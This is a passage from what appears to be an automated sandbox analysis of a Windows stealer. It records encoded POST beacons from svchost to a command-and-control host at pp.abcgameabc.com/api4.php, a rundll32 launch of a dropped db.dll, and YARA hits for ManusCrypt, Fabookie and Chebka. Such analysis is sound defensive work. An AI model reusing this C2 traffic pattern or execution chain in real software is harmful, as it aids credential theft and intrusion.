                                                                                            2022-09-02 09:02:36 UTC621INData Raw: b2 b2 a3 a3 9d 9d 89 89 fb fb f4 f4 ee ee d8 d8 d3 d3 cb cb c5 c5 3f 20 20 00 34 35 01 00 01 31 37 37 3e 3e 24 24 2c 2c 13 13 18 18 00 00 09 09 75 75 7a 7a 7f 7f 65 65 69 69 6f 6f 54 54 5a 5a 42 42 4e 4e a4 a4 af af 94 94 9f 9f 84 84 8f 8f f4 f4 e1 e1 ef ef d5 d5 c5 c5 22 23 29 29 05 05 61 61 53 53 80 80 86 86 f9 f9 c0 c0 cb cb 37 34 0b 0b 70 70 7c 7c b6 b6 bf bf ab ab 83 83 f7 f7 d4 d4 de de 25 24 54 54 5c 5c 9a 9a 80 80 e8 e8 c7 c7 06 01 51 51 43 43 fd fd fb fb c5 c5 3b 3a 04 04 0a 0a 7b 7b b2 b2 ba ba e9 e9 d2 d2 da da 34 37 3a 3a 8e 8f fc fc e4 e4 ee ee e9 e9 d1 d1 67 68 6e 6e 51 51 4b 4b b4 b4 a0 a0 9c 9c 93 93 da da 0c 0d 7f 7f 4e 4e b7 b7 a7 a7 9a 9a fb fb fe fe 68 6b 62 62 50 50 bb bb bd bd b7 b7 a7 a7 9d 9d 8a 8a 83 83 f1 f1 ee ee da da d3 d3 ca
                                                                                            Data Ascii: ? 45177>>$$,,uuzzeeiiooTTZZBBNN"#))aaSS74pp||%$TT\\QQCC;:{{47::ghnnQQKKNNhkbbPP
                                                                                            2022-09-02 09:02:36 UTC622INData Raw: 9b 72 73 c0 c0 2d 2e a0 a0 51 50 2d 22 77 77 50 50 57 57 4f 4f 44 44 b8 b8 bc bc 95 95 eb eb c9 c9 c0 c0 c4 c4 38 39 3d 3d 31 31 35 35 29 29 2d 2d 67 67 5d 5d 51 51 55 55 49 49 ef ef d8 d8 c5 c5 3a 39 32 32 36 36 2a 2a 0b 0b 61 61 b7 b7 ae ae a2 a2 a6 a6 9a 9a 9e 9e 92 92 96 96 8a 8a c0 c0 3a 3b 3f 3f 33 33 37 37 fa fd f0 f0 dc dc 79 78 6c 6c f4 f4 de de d1 d1 3d 70 70 00 20 20 00 00 2a 1a 77 77 41 41 9a 9a 89 89 a6 a7 99 99 2e 2d e0 e0 0f 08 7b 7b b5 b7 37 80 80 00 14 14 00 00 00 31 35 35 39 39 3d 3d 1d 1d 01 01 31 90 90 00 44 44 00 00 5c 6e 52 52 96 96 9a 9a fa fa da da 3a 3b 27 27 03 03 7f 7f 63 63 43 43 a3 a3 9f 9f 83 83 ff ff e3 e3 c3 c3 3f 38 24 24 04 04 64 64 44 44 a4 a4 84 84 e4 e4 c4 c4 38 39 25 25 35 00 00 a0 a0 00 e4 e4 00 00 08 38 fc fc e4 e4
                                                                                            Data Ascii: rs-.QP-"wwPPWWOODD89==1155))--gg]]QQUUII:92266**aa:;??3377yxll=pp *wwAA.-{{715599==1DD\nRR:;''ccCC?8$$ddDD89%%58


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2192.168.2.349774104.21.34.132443C:\Windows\System32\svchost.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-09-02 09:03:52 UTC625OUTPOST /api4.php HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                            Host: pp.abcgameabc.com
                                                                                            Content-Length: 274
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2022-09-02 09:03:52 UTC625OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 63 71 4b 4c 58 72 61 4b 72 31 71 4b 6f 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 49 65 48 68 36 69 62 6d 4a 69 62 71 4e 53 59 68 70 71 59 68 70 6e 58 68 35 69 71 31 71 75 62 6d 4b 76 66 71 5a 71 70 6d 64 53 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 66 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 4d 70 71 43 6b 70 6d 69 66 6c 48 75 6d 33
                                                                                            Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbcqKLXraKr1qKoqaagpKZjZ3lsb2J7b3im3qSmqIeHh6ibmJibqNSYhpqYhpnXh5iq1qubmKvfqZqpmdSmoKSmY2p7lqbepKbfot@moKSmlnt9b2Vipt6kpr6MpqCkpmiflHum3
                                                                                            2022-09-02 09:03:53 UTC625INHTTP/1.1 200 OK
                                                                                            Date: Fri, 02 Sep 2022 09:03:53 GMT
                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P0OHmgwOBuKjw4GhRjyHYOYwhYICkUuzvuzx7Uh7laJarHSnJFWTGSMo%2F1yg3Gegvo2WH%2B7TQxMSNRxDjfxDlct2Bnpd13hpWG%2Bl0Pi2uFM2W6WCTptBs0LZJuK0ZvBQhrGECg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 74451333bc529b70-FRA
                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                            2022-09-02 09:03:53 UTC626INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                            Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                            2022-09-02 09:03:53 UTC626INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            3192.168.2.349775104.21.34.132443C:\Windows\System32\svchost.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-09-02 09:03:53 UTC626OUTPOST /api4.php HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                            Host: pp.abcgameabc.com
                                                                                            Content-Length: 274
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2022-09-02 09:03:53 UTC626OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 63 71 4b 4c 58 72 61 4b 72 31 71 4b 6f 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 49 65 48 68 36 69 62 6d 4a 69 62 71 4e 53 59 68 70 71 59 68 70 6e 58 68 35 69 71 31 71 75 62 6d 4b 76 66 71 5a 71 70 6d 64 53 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 66 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 4d 70 71 43 6b 70 6d 69 66 6c 48 75 6d 33
                                                                                            Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbcqKLXraKr1qKoqaagpKZjZ3lsb2J7b3im3qSmqIeHh6ibmJibqNSYhpqYhpnXh5iq1qubmKvfqZqpmdSmoKSmY2p7lqbepKbfot@moKSmlnt9b2Vipt6kpr6MpqCkpmiflHum3
                                                                                            2022-09-02 09:03:54 UTC627INHTTP/1.1 200 OK
                                                                                            Date: Fri, 02 Sep 2022 09:03:54 GMT
                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z5cNgpwwmIGF1GZGKOTICTee1BaMHkKP95IgniF120YjHfYcRdOy%2BHwr8zp6rLCcSsoSl3pwFtrRRi9u%2FvQLu4C3BxQP6oXj2Ascukv29gbvBrduwed5mQ2KSBV5naZCOY%2Bw1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 744513380c7690fe-FRA
                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                            2022-09-02 09:03:54 UTC627INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                            Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                            2022-09-02 09:03:54 UTC627INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            4192.168.2.349776104.21.34.132443C:\Windows\System32\svchost.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-09-02 09:03:55 UTC627OUTPOST /api4.php HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                            Host: pp.abcgameabc.com
                                                                                            Content-Length: 1590
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2022-09-02 09:03:55 UTC628OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 73 5a 47 6d 68 70 5a 6c 62 57 6c 37 6c 71 62 65 70 4b 61 5a 62 4a 5a 6c 59 33 75 6d 6f 4b 53 6d 6d 57 56 6c 59 57 39 37 61 61 62 65 70 4b 61 50 6d 4a 76 54 68 34 79 4e 6c 34 69 4c 59 5a 35 75 61 58 6d 24 76 71 76 57 67 6f 65 24 33 47 4c 55 65 59 6a 66 71 32 35 76 62 6f 71 71 6a 64 53 66 61 34 4f 71 67 6d 32 61 33 49 32 4e 74 32 57 47 6c 70 68 35 68 36 4f 66 6e 4c 53 30 6d 57 35 74 6a 59 78 6f 69 6f 68 34 69 39 47 6b 70 71 43 6b 70 6d 78 6c 61 57 69 6d 33 71 53 6d 6f 6e 68 6c 61 32 5a 67 65 33 6c 67 62 33 6c 68 6f 6d 4a 37 61 4b 61 54 6f 4b 53 52 70 6f 61 57 5a
                                                                                            Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6ksZGmhpZlbWl7lqbepKaZbJZlY3umoKSmmWVlYW97aabepKaPmJvTh4yNl4iLYZ5uaXm$vqvWgoe$3GLUeYjfq25vboqqjdSfa4Oqgm2a3I2Nt2WGlph5h6OfnLS0mW5tjYxoioh4i9GkpqCkpmxlaWim3qSmonhla2Zge3lgb3lhomJ7aKaToKSRpoaWZ
                                                                                            2022-09-02 09:03:55 UTC629INHTTP/1.1 200 OK
                                                                                            Date: Fri, 02 Sep 2022 09:03:55 GMT
                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8ZRMD9H5UzcI1URMfNOCY6vn%2Bnk2f8s31QQsYchcP3HiPK1%2B5R7zj3UOVT2Rf8bWprakFQoqBfEKdwvw63aBktQ%2FPyKc6B3RVlEwKzRsAud780T%2BAWg7HpyPjI%2BUMevJfgG9sQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 744513425ccf9bb3-FRA
                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                            2022-09-02 09:03:55 UTC630INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                            Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                            2022-09-02 09:03:55 UTC630INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            5192.168.2.349777104.21.34.132443C:\Windows\System32\svchost.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-09-02 09:03:55 UTC630OUTPOST /api4.php HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                            Host: pp.abcgameabc.com
                                                                                            Content-Length: 250
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2022-09-02 09:03:55 UTC630OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 5a 70 61 47 64 6f 65 36 62 65 70 4b 75 54 6f 4b 53 6d 62 35 53 6d 33 71 53 6d 33 4b 69 69 31 36 32 69 71 39 61 69 71 4b 6d 6d 6f 4b 53 6d 59 32 64 35 62 47 39 69 65 32 39 34 70 74 36 6b 70 71 69 48 68 34 65 6f 6d 35 69 59 6d 36 6a 55 6d 49 61 61 6d 49 61 5a 31 34 65 59 71 74 61 72 6d 35 69 72 33 36 6d 61 71 5a 6e 55 70 71 43 6b 70 6d 4e 71 65 35 61 6d 33 71 53 6d 33 36 4c 66 70 71 43 6b 70 70 5a 37 66 57 39 6c 59 71 62 65 70 4b 61 40 6a 4b 61 67 70 4b 5a 6f 6e 35 52 37 70 74 36 6b 71 36 43 6b 70 6d 70 37 6c 71 62 65 70 4b 6e 57 6b 77 3d 3d
                                                                                            Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaZpaGdoe6bepKuToKSmb5Sm3qSm3Kii162iq9aiqKmmoKSmY2d5bG9ie294pt6kpqiHh4eom5iYm6jUmIaamIaZ14eYqtarm5ir36maqZnUpqCkpmNqe5am3qSm36LfpqCkppZ7fW9lYqbepKa@jKagpKZon5R7pt6kq6Ckpmp7lqbepKnWkw==
                                                                                            2022-09-02 09:03:56 UTC630INHTTP/1.1 200 OK
                                                                                            Date: Fri, 02 Sep 2022 09:03:56 GMT
                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4PznREKlK%2FUXdErR0w0JvFHHr3p2Kcp%2FRHRQKEjVCAVzy6EuUop1JYSoXzozLydrd0knNWAvm%2Bto%2Fmor3IEdEOFqsAJxoZGRKmY9pMkW%2F90B%2BQ0hH3MAPQxxrUf0JG49md6qyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 744513467ebb915f-FRA
                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                            2022-09-02 09:03:56 UTC631INData Raw: 34 65 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 2c 22 63 6b 22 3a 5b 5d 2c 22 69 6e 73 63 6b 22 3a 5b 5d 7d 7d 0d 0a
                                                                                            Data Ascii: 4e{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1,"ck":[],"insck":[]}}
                                                                                            2022-09-02 09:03:56 UTC631INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:11:02:30
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:86016 bytes
                                                                                            MD5 hash:2EF8DA551CF5AB2AB6E3514321791EAB
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low

                                                                                            Target ID:2
                                                                                            Start time:11:02:31
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff745070000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:3
                                                                                            Start time:11:02:31
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\file.exe" -h
                                                                                            Imagebase:0x400000
                                                                                            File size:86016 bytes
                                                                                            MD5 hash:2EF8DA551CF5AB2AB6E3514321791EAB
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low

                                                                                            Target ID:5
                                                                                            Start time:11:02:32
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff745070000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:8
                                                                                            Start time:11:02:37
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
                                                                                            Imagebase:0x7ff6caab0000
                                                                                            File size:69632 bytes
                                                                                            MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:10
                                                                                            Start time:11:02:37
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
                                                                                            Imagebase:0x930000
                                                                                            File size:61952 bytes
                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000A.00000002.447857921.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000A.00000002.447857921.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Fabookie, Description: Detects Fabookie / ElysiumStealer, Source: 0000000A.00000002.447857921.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000A.00000002.447857921.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high

                                                                                            Target ID:11
                                                                                            Start time:11:02:39
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000B.00000002.799791043.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000B.00000002.799791043.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000000B.00000002.799791043.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000B.00000002.799791043.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000B.00000003.287397377.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000B.00000003.287397377.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000B.00000003.287397377.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000B.00000000.289004443.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000B.00000000.289004443.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000000B.00000000.289004443.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000B.00000000.289004443.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high

                                                                                            Target ID:13
                                                                                            Start time:11:02:40
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\svchost.exe -k WspService
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., Source: 0000000D.00000002.819358174.000001A74B240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.819358174.000001A74B240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000003.428573699.000001A74A303000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000003.310094531.000001A7480A3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.802924831.000001A7480B6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.813505830.000001A74A300000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000003.320925913.000001A7480A3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.808468509.000001A748340000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000D.00000002.808468509.000001A748340000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000000D.00000002.808468509.000001A748340000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000D.00000002.808468509.000001A748340000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000003.435768980.000001A7480A3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
